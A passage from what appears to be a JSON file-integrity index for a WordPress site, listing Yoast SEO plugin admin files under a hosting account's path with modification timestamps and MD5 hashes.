ara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/google_search_console\\/class-gsc-settings.php\":{\"d\":1545638232,\"h\":\"dce455cd9adf4ce2d40de0449f0cf942\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/google_search_console\\/class-gsc-count.php\":{\"d\":1545638232,\"h\":\"e434c8628267e8d74a80eb5a93b59170\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/google_search_console\\/class-gsc-platform-tabs.php\":{\"d\":1545638232,\"h\":\"f543e371b51ccfb2a8920ec2a85ef035\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/google_search_console\\/class-gsc-ajax.php\":{\"d\":1545638232,\"h\":\"699a8a51b04f8b64b199b67ea9f873b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/google_search_console\\/class-gsc-bulk-action.php\":{\"d\":1545638232,\"h\":\"a9aa9f6a40acdf9647b4034ff3d13a55\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/google_search_console\\/class-gsc.php\":{\"d\":1545638232,\"h\":\"2a193685fed8d932a27448d3c71f27b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/google_search_console\\/class-gsc-marker.php\":{\"d\":1545638232,\"h\":\"71f60b7e07a59a585c7950bea41a7933\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/form\\/select.php\":{\"d\":1545638232,\"h\":\"2dbacc0911940d6aeacbca8a6766b67a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/form\\/fieldset.php\":{\"d\":1545638232,\"h\":\"d670bd5417fcdf3884a1865846c56044\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/social\\/google.php\":{\"d\":1545638232,\"h\":\"1d4bfdfe5055044d9cc84762956ed8c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/social\\/accounts.php\":{\"d\":1545638232,\"h\":\"5e420e551737618708fe2f3929d34b84\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/social\\/facebook.php\":{\"d\":1545638232,\"h\":\"87c1dd5c92b00069d5797d62be42ebd9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/social\\/twitterbox.php\":{\"d\":1545638232,\"h\":\"6af8cbb833fb520c24d41027bf6817ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/social\\/pinterest.php\":{\"d\":1545638232,\"h\":\"a53655fd9aa5a3263a21ae97fec862d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/tool\\/import-seo.php\":{\"d\":1545638232,\"h\":\"5dae9d8174b3960649e3298b4142d7fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/tool\\/wpseo-import.php\":{\"d\":1545638232,\"h\":\"a7110e18cbe8a5789f3e8854d2f1acac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/tool\\/wpseo-export.php\":{\"d\":1545638232,\"h\":\"6a366f2bbb50273530647be8542564b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/dashboard\\/site-analysis.php\":{\"d\":1545638232,\"h\":\"681de2e91bbaf3a62fef7ce054359739\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/dashboard\\/dashboard.php\":{\"d\":1545638232,\"h\":\"e8bbf8b7525565fbc91ee2803e2fc46a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/dashboard\\/webmaster-tools.php\":{\"d\":1545638232,\"h\":\"66dfabbb65cdfd7a0827ac43e548052c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/dashboard\\/features.php\":{\"d\":1545638232,\"h\":\"0f37cff1c854ed83bc50d35b676445c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/network\\/restore-site.php\":{\"d\":1545638232,\"h\":\"2b5b40af5e71c7cf858549a9bd3591e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/network\\/general.php\":{\"d\":1545638232,\"h\":\"99a923605632969fefb48ecc887e281b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/network\\/features.php\":{\"d\":1545638232,\"h\":\"1fed119a51a2ad0a8e88570b32cad2cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/taxonomies\\/category-url.php\":{\"d\":1545638232,\"h\":\"5e4b30073e965e909b0586b34a435e09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/archives\\/help.php\":{\"d\":1545638232,\"h\":\"650d756c4e7cdbc58431fec236831910\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/general\\/title-separator.php\":{\"d\":1545638232,\"h\":\"ce33db17aa8f2a9fb409e93eab6abb59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/general\\/force-rewrite-title.php\":{\"d\":1545638232,\"h\":\"b12accf8c5b7fea230f62714ed580ba4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/general\\/homepage.php\":{\"d\":1545638232,\"h\":\"6ad16e4185da001e235e701b9d93c324\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/general\\/knowledge-graph.php\":{\"d\":1545638232,\"h\":\"80ecf43ac2b9b5e3adf08a99199f96c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/post_type\\/woocommerce-shop-page.php\":{\"d\":1545638232,\"h\":\"7bcda08f85d28d6e4dca2219948ff9f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/post_type\\/post-type.php\":{\"d\":1545638232,\"h\":\"d19f090b2bd60f6660c67349aa5e03c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/taxonomy-content.php\":{\"d\":1545638232,\"h\":\"86c329f81c32d67fafe30dd77e58ec7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/general-content.php\":{\"d\":1545638232,\"h\":\"4986081ed3f7cb4bf75c5db1e033fbe9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/media-content.php\":{\"d\":1545638232,\"h\":\"e84f56c1b7ab2495bbf637b254dffbdf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/rss-content.php\":{\"d\":1545638232,\"h\":\"c66cb5e1d904643f91b18fbf771a6395\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/breadcrumbs-content.php\":{\"d\":1545638232,\"h\":\"b65881105b302740fcd4a1ac26d37aac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/author-archive-settings.php\":{\"d\":1545638232,\"h\":\"b169808179639b39c696270b88972866\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/special-pages.php\":{\"d\":1545638232,\"h\":\"2b7c54294cb77ecafe794ff0e12a81ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/date-archives-settings.php\":{\"d\":1545638232,\"h\":\"73154aae2fd81956c9e76a407c2a883a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/paper-content\\/post-type-content.php\":{\"d\":1545638232,\"h\":\"12783345c43d67833e3202f46a0f1435\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/post-types.php\":{\"d\":1545638232,\"h\":\"517dc2e2bdadcd4b78b566b62b40c86d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/taxonomies.php\":{\"d\":1545638232,\"h\":\"666d6b204c01848821838fcb16623338\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/archives.php\":{\"d\":1545638232,\"h\":\"75ec8840bea4c089ab82c72002cedf2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/rss.php\":{\"d\":1545638232,\"h\":\"e6468fb9165063cb57a1ee9f7d7b8f52\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/breadcrumbs.php\":{\"d\":1545638232,\"h\":\"6f4fa9635c1770e41bb205353612ce20\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/media.php\":{\"d\":1545638232,\"h\":\"45320adfc8fecac306fe72aec7d9bd63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tabs\\/metas\\/general.php\":{\"d\":1545638232,\"h\":\"f9b6dcd31ce341891e465a494669d263\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/interface-yoast-form-element.php\":{\"d\":1545638232,\"h\":\"4e7b0acd1547061027970d436ae14225\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/class-yoast-feature-toggles.php\":{\"d\":1545638232,\"h\":\"57f471a4c416ebea267379510aa4b1f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/class-yoast-feature-toggle.php\":{\"d\":1545638232,\"h\":\"dcfabb9697560c5220c757a72fb49f71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/class-yoast-input-select.php\":{\"d\":1545638232,\"h\":\"700272dc7e4cdf198350226f00279375\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/user-profile.php\":{\"d\":1545638232,\"h\":\"a059d5445ebc233a857ec02b09332563\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/js-templates-primary-term.php\":{\"d\":1545638232,\"h\":\"9558fcbaa5a70d4787f784eeced16fb6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tool-import-export.php\":{\"d\":1545638232,\"h\":\"fc3e077dff7bfac5cf056d2de90d844b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/sidebar.php\":{\"d\":1545638232,\"h\":\"46dc32cc4d0b018ae3e2c962a258d461\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/partial-alerts-errors.php\":{\"d\":1545638232,\"h\":\"c0d10c2d2cf42147ffc2320573ef9725\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tool-bulk-editor.php\":{\"d\":1545638232,\"h\":\"7df714296b53740f3dadc1b3514ab4cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/paper-collapsible.php\":{\"d\":1545638232,\"h\":\"adb30efc4941da708699a027d2f5dd0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/class-view-utils.php\":{\"d\":1545638232,\"h\":\"6d3c133e0658a13497c7edf6ff3e7e7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/tool-file-editor.php\":{\"d\":1545638232,\"h\":\"ced6e0346c416eba669ecc91f85cbe96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/partial-alerts-warnings.php\":{\"d\":1545638232,\"h\":\"2f24ffc6a3b15571e33acaa05de6cf5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/licenses.php\":{\"d\":1545638232,\"h\":\"87c6e536917f81ba850f83e4a7da478d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/class-yoast-form-fieldset.php\":{\"d\":1545638232,\"h\":\"201983e42aea3605ddb34b98b14a6a81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/views\\/partial-alerts-template.php\":{\"d\":1545638232,\"h\":\"da0a74b7d033f84b22beb3833be368ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/watchers\\/class-slug-change-watcher.php\":{\"d\":1545638232,\"h\":\"26d7387423d1b5d7ae78a6878dc3f844\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/formatter\\/interface-metabox-formatter.php\":{\"d\":1545638232,\"h\":\"818bb4e25159e239245549d2c52b0d77\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/formatter\\/class-post-metabox-formatter.php\":{\"d\":1545638232,\"h\":\"a0b939d22db18d660440c8eb0f4f496c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/formatter\\/class-term-metabox-formatter.php\":{\"d\":1545638232,\"h\":\"161f55c2475653be13bb87462a808bdc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/formatter\\/class-metabox-formatter.php\":{\"d\":1545638232,\"h\":\"6f7353e5c1932ad0877aa605913179a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/help_center\\/class-template-variables-tab.php\":{\"d\":1545638232,\"h\":\"3fcb765cbd60df6a4f708cdd00f5c643\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/exceptions\\/class-file-size-exception.php\":{\"d\":1545638232,\"h\":\"8f6979cd76def2a8233c94be5121a781\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/listeners\\/class-listener.php\":{\"d\":1545638232,\"h\":\"7a1c9dd6397ac41b2598bf30f65bd3bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/recalculate\\/class-recalculate-posts.php\":{\"d\":1545638232,\"h\":\"1fd01aee2855b2e765baea7fab41e7b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/recalculate\\/class-recalculate.php\":{\"d\":1545638232,\"h\":\"a6621ed74c7db98b8304357bdb091e6e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/recalculate\\/class-recalculate-terms.php\":{\"d\":1545638232,\"h\":\"7d08afd775d0be28f30e8a009f744a96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/endpoints\\/class-endpoint.php\":{\"d\":1545638232,\"h\":\"225e55baa77ffdd666bc698bb61219c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/endpoints\\/interface-endpoint-storable.php\":{\"d\":1545638232,\"h\":\"a7de52ee280dcbc9ca3792d2c1bd9415\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/endpoints\\/class-endpoint-indexable.php\":{\"d\":1545638232,\"h\":\"69846e9d45220875071afb53849664e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/endpoints\\/class-endpoint-statistics.php\":{\"d\":1545638232,\"h\":\"54690f765415568ecc2ad6303bd7ee29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/endpoints\\/class-endpoint-ryte.php\":{\"d\":1545638232,\"h\":\"f82b36df89a4233e9ec6b4e4fe7d7506\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/endpoints\\/class-endpoint-file-size.php\":{\"d\":1545638232,\"h\":\"0cf3524c42037e3c807ee00fca9c5147\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy-settings-fields.php\":{\"d\":1545638232,\"h\":\"9c6c3d43f614be5e0ffac96c29f6d1cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy-fields-presenter.php\":{\"d\":1545638232,\"h\":\"072748c8b2d05d8457bba5728634c6e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy-content-fields.php\":{\"d\":1545638232,\"h\":\"e89bfaea118379606429bc2d888455a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy-metabox.php\":{\"d\":1545638232,\"h\":\"ed0e46fdb8bcc6102dab4b4efa1b55ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy-columns.php\":{\"d\":1545638232,\"h\":\"b95f303a8809001586bc1a547ed33828\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy-social-fields.php\":{\"d\":1545638232,\"h\":\"ea7dde4315fb0ea205df968f16b3027f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy.php\":{\"d\":1545638232,\"h\":\"772ddb6577537aba4e3d1bbe86e92b9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/taxonomy\\/class-taxonomy-fields.php\":{\"d\":1545638232,\"h\":\"73e65cdaf62c3d4637ed534ad97d1dde\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/ajax\\/class-yoast-dismissable-notice.php\":{\"d\":1545638232,\"h\":\"92f511d6142af91a37326cfc6ad23da5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/ajax\\/class-yoast-onpage-ajax.php\":{\"d\":1545638232,\"h\":\"49ab079c6719ec0452d4abfbf4162812\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/ajax\\/class-shortcode-filter.php\":{\"d\":1545638232,\"h\":\"9a3b33160caf6dcd6d1233335f1e3057\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/ajax\\/class-recalculate-scores-ajax.php\":{\"d\":1545638232,\"h\":\"1fe900f89f5d569322622f86137f7c49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/ajax\\/class-yoast-plugin-conflict-ajax.php\":{\"d\":1545638232,\"h\":\"05f1917b54bb7c060354b9fc1e8d61e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-gutenberg-compatibility-notification.php\":{\"d\":1545638228,\"h\":\"5f57cef483fcbfcc0ef1eba9f24641cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/interface-collection.php\":{\"d\":1545638228,\"h\":\"a1d12fea387372f225e62cccc9239f9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-multiple-keywords-modal.php\":{\"d\":1545638228,\"h\":\"789ba12da09aff0c18a18af2d31de1e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-meta-table-accessible.php\":{\"d\":1545638228,\"h\":\"80b2a0116ce368b16446c7302f810963\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-license-page-manager.php\":{\"d\":1545638228,\"h\":\"c17924b3cb541a9312f7f439dc043daa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-bulk-description-editor-list-table.php\":{\"d\":1545638228,\"h\":\"461f9fba8acbacfd5fd0f667d55c7dc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-extensions.php\":{\"d\":1545638228,\"h\":\"86924e913da21ab592a0e2ef9b73de03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-network-settings-api.php\":{\"d\":1545638228,\"h\":\"f80569c4eeb872f5561becfc2465befc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-help-panel.php\":{\"d\":1545638228,\"h\":\"fab6f38ef1e013356ef82cd97c365ec0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/interface-installable.php\":{\"d\":1545638228,\"h\":\"9de4ebd042a2071bb50a51491ba7d43c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-columns.php\":{\"d\":1545638228,\"h\":\"0b4ed4ef57f1fd6831b59cb41c0cd9cc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-asset-analysis-worker-location.php\":{\"d\":1545638228,\"h\":\"3d6c2d34e52d4e178908bee98498d7e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-option-tabs.php\":{\"d\":1545638228,\"h\":\"4864f9f4ef411073d89d79be26a20b67\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/my-yoast-proxy.php\":{\"d\":1545638228,\"h\":\"1d174ae3ac3c7e42cf101c7e3dc0d28c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-user-profile.php\":{\"d\":1545638228,\"h\":\"c753df6868aae60fa74693c1be5da08f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-plugin-availability.php\":{\"d\":1545638228,\"h\":\"8d15750ca08386d99b54f427ae142073\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-plugin-conflict.php\":{\"d\":1545638228,\"h\":\"98cbdc79b392729204167e5275867a7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-option-tabs-formatter.php\":{\"d\":1545638228,\"h\":\"201b6a96030e6ddc0484f906734d5814\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-asset-seo-location.php\":{\"d\":1545638228,\"h\":\"680002a763e050137dd75bf75b6f3b38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-editor-specific-replace-vars.php\":{\"d\":1545638228,\"h\":\"603b0ddc4546eb704288144a985382c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-recommended-replace-vars.php\":{\"d\":1545638228,\"h\":\"1b51a468f33cef50064d0526532b8ce5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-dashboard-widget.php\":{\"d\":1545638228,\"h\":\"73ca86e1f630bb0d29346ba2a3ee5b54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-asset-manager.php\":{\"d\":1545638228,\"h\":\"06d943993f5e72c4403e063dd9fe9f76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-config.php\":{\"d\":1545638228,\"h\":\"c45e14e30e6bc0da8b26c5dc0017b8b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-form.php\":{\"d\":1545638228,\"h\":\"135166427a31f3746ee9e8f49f4ac339\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-bulk-editor-list-table.php\":{\"d\":1545638228,\"h\":\"a0fc27015de6dca3354360f6f3f5f595\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-asset-